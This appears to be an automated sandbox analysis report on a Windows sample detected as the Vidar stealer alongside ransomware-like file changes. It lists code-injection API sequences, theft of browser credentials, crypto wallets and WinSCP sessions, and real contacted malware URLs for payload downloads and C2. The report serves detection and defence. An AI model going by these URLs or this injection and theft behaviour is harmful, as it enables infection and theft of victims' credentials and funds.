Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Memory written: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Memory written: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe base: 400000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_02290110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 0_2_02290110
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe --Task Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart Jump to behavior
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe"
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: GetCursorInfo,CharUpperA,GetConsoleAliasesLengthW,GetDefaultCommConfigW,GetProfileSectionA,_puts,GetFileInformationByHandle,_realloc,_realloc,_realloc,_fseek,SetCalendarInfoA,SetCalendarInfoA,SetCurrentDirectoryW,BuildCommDCBAndTimeoutsW,CreateFileW,OpenJobObjectA,WriteConsoleOutputCharacterA,MapUserPhysicalPages,AddAtomA,GetThreadPriority,GetFullPathNameA,FindNextVolumeMountPointW,FillConsoleOutputCharacterA,EnumResourceNamesW,OpenWaitableTimerW,LocalSize,_hwrite,GetPrivateProfileStructA,GetComputerNameW,EnumDateFormatsExA,GetConsoleAliasesW,GetComputerNameW,GetConsoleTitleA,GetSystemWindowsDirectoryW,SetCalendarInfoA,GetFileAttributesA,HeapFree,lstrcpyW,LocalAlloc,GetConsoleFontSize,EnumDateFormatsA,ConvertThreadToFiber,InterlockedCompareExchange,VerifyVersionInfoA,FormatMessageW,SetCommState,FindResourceA,CreateMutexA,MoveFileA,LockFileEx,ResetEvent,FindNextFileW,GetComputerNameExA,CopyFileW,FileTimeToSystemTime,EnumSystemLocalesA,GetComputerNameW,WriteConsoleA,GlobalGetAtomNameW,LoadLibraryA,SetConsoleWindowInfo,GetCPInfoExW,EnumResourceLanguagesA,TerminateThread,GetDiskFreeSpaceExW,GetPrivateProfileStructW,GetConsoleAliasW,lstrcpyA,GetOEMCP,ExitThread, 0_2_00409909
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: GetLocaleInfoA, 0_2_004277E0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 1_2_0043404A
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 1_2_00438178
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_00440116
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_004382A2
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 1_2_0043834F
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 1_2_00438423
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_004335E7
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: EnumSystemLocalesW, 1_2_004387C8
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: GetLocaleInfoW, 1_2_0043884E
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 1_2_00432B6D
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 1_2_00437BB3
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: EnumSystemLocalesW, 1_2_00437E27
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 1_2_00437E83
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 1_2_00437F00
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 1_2_0042BF17
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 1_2_00437F83
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 1_2_00432FAD
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00427756 cpuid 1_2_00427756
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00415910 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00415910
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 1_2_0042FE47
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409605 GetComputerNameW,LoadLibraryA,LoadLibraryW,GetProcAddress,InterlockedExchangeAdd,VerifyVersionInfoW,GetTickCount,DebugBreak,GetConsoleAliasExesLengthW,GetPrivateProfileIntA,GetLastError,GetSystemWow64DirectoryW,IsDBCSLeadByte,CreateMailslotA,GetStartupInfoW,InterlockedExchangeAdd,_hwrite,HeapSize,VerifyVersionInfoW,InterlockedIncrement,InterlockedIncrement,AddAtomA,WriteProfileSectionW,GetConsoleAliasesLengthW,GetSystemDefaultLangID,CreateNamedPipeW,AbortSystemShutdownW,ImpersonateNamedPipeClient,LoadLibraryA,GetOverlappedResult,FindNextVolumeW,LeaveCriticalSection,GetModuleHandleW,FormatMessageW,CreateActCtxA,CopyFileW,GetConsoleTitleA,VerifyVersionInfoW,InterlockedIncrement,InterlockedExchangeAdd,InterlockedIncrement,GetCommandLineA,SetLastError,MoveFileWithProgressW,VerifyVersionInfoA, 0_2_00409605
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90

Stealing of Sensitive Information
barindex
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: build2.exe PID: 5652, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_wallet0
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: build2.exe, 0000000D.00000002.620328877.00000000022CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.conf.jsonw
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.conf.jsonw
Source: build2.exe, 0000000D.00000002.618683629.0000000000705000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorageL
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ntdesk\AppData\Roaming\Ethereum\
Source: build2.exe, 0000000D.00000002.649603691.0000000026CD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: dus\exodus.w
Source: build2.exe, 0000000D.00000002.649603691.0000000026CD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_wallet0
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ntdesk\AppData\Roaming\Ethereum\
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: oaming\MultiDoge\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Yara detected Credential Stealer
Source: Yara match File source: 0000000D.00000002.615942779.0000000000648000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: build2.exe PID: 5652, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 679173 Sample: 2OmglUwx83.exe Startdate: 05/08/2022 Architecture: WINDOWS Score: 100 72 Snort IDS alert for network traffic 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Antivirus detection for URL or domain 2->76 78 10 other signatures 2->78 10 2OmglUwx83.exe 2->10         started        13 2OmglUwx83.exe 2->13         started        15 2OmglUwx83.exe 2->15         started        17 2OmglUwx83.exe 2->17         started        process3 signatures4 88 Contains functionality to inject code into remote processes 10->88 90 Writes many files with high entropy 10->90 92 Injects a PE file into a foreign processes 10->92 19 2OmglUwx83.exe 1 16 10->19         started        23 2OmglUwx83.exe 12 13->23         started        25 2OmglUwx83.exe 12 15->25         started        27 2OmglUwx83.exe 17->27         started        process5 dnsIp6 64 api.2ip.ua 162.0.217.254, 443, 49769, 49770 ACPCA Canada 19->64 54 C:\Users\...\2OmglUwx83.exe:Zone.Identifier, ASCII 19->54 dropped 56 C:\Users\user\AppData\...\2OmglUwx83.exe, MS-DOS 19->56 dropped 29 2OmglUwx83.exe 19->29         started        32 icacls.exe 19->32         started        66 192.168.2.1 unknown unknown 25->66 file7 process8 signatures9 100 Injects a PE file into a foreign processes 29->100 34 2OmglUwx83.exe 1 23 29->34         started        process10 dnsIp11 58 acacaca.org 5.163.244.118, 49772, 49773, 80 SAUDINETSTC-ASSA Saudi Arabia 34->58 60 rgyui.top 151.251.24.5, 49771, 80 IBGCBG Bulgaria 34->60 62 api.2ip.ua 34->62 46 C:\Users\user\AppData\Local\...\build2[1].exe, PE32 34->46 dropped 48 C:\Users\user\AppData\Local\...\build2.exe, PE32 34->48 dropped 50 C:\_readme.txt, ASCII 34->50 dropped 52 34 other files (30 malicious) 34->52 dropped 80 Modifies existing user documents (likely ransomware behavior) 34->80 39 build2.exe 34->39         started        file12 signatures13 process14 signatures15 82 Multi AV Scanner detection for dropped file 39->82 84 Detected unpacking (creates a PE file in dynamic memory) 39->84 86 Machine Learning detection for dropped file 39->86 42 build2.exe 39->42         started        process16 dnsIp17 68 t.me 149.154.167.99, 443, 49775 TELEGRAMRU United Kingdom 42->68 70 49.12.9.140, 1080, 49780 HETZNER-ASDE Germany 42->70 94 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 42->94 96 Tries to harvest and steal browser information (history, passwords, etc) 42->96 98 Tries to steal Crypto Currency Wallets 42->98 signatures18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
49.12.9.140
 unknown Germany
24940 HETZNER-ASDE false
162.0.217.254
 api.2ip.ua Canada
35893 ACPCA false
151.251.24.5
 rgyui.top Bulgaria
13124 IBGCBG true
5.163.244.118
 acacaca.org Saudi Arabia
25019 SAUDINETSTC-ASSA true
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
rgyui.top 151.251.24.5 true
t.me 149.154.167.99 true
api.2ip.ua 162.0.217.254 true
acacaca.org 5.163.244.118 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://rgyui.top/dl/build2.exe true
  • Avira URL Cloud: malware
 unknown
http://acacaca.org/test2/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true true
  • Avira URL Cloud: malware
 unknown
https://t.me/pegasusfly1 false
    		high
    http://49.12.9.140:1080/517 false
    • Avira URL Cloud: safe
    		 unknown
    http://acacaca.org/files/1/build3.exe true
    • Avira URL Cloud: malware
    		 unknown
    https://api.2ip.ua/geo.json false
      		high
      http://acacaca.org/test2/get.php true
      • Avira URL Cloud: malware
      		 unknown
      http://49.12.9.140:1080/2277399138.zip false
      • Avira URL Cloud: safe
      		 unknown
      http://49.12.9.140:1080/ false
      • Avira URL Cloud: safe
      		 unknown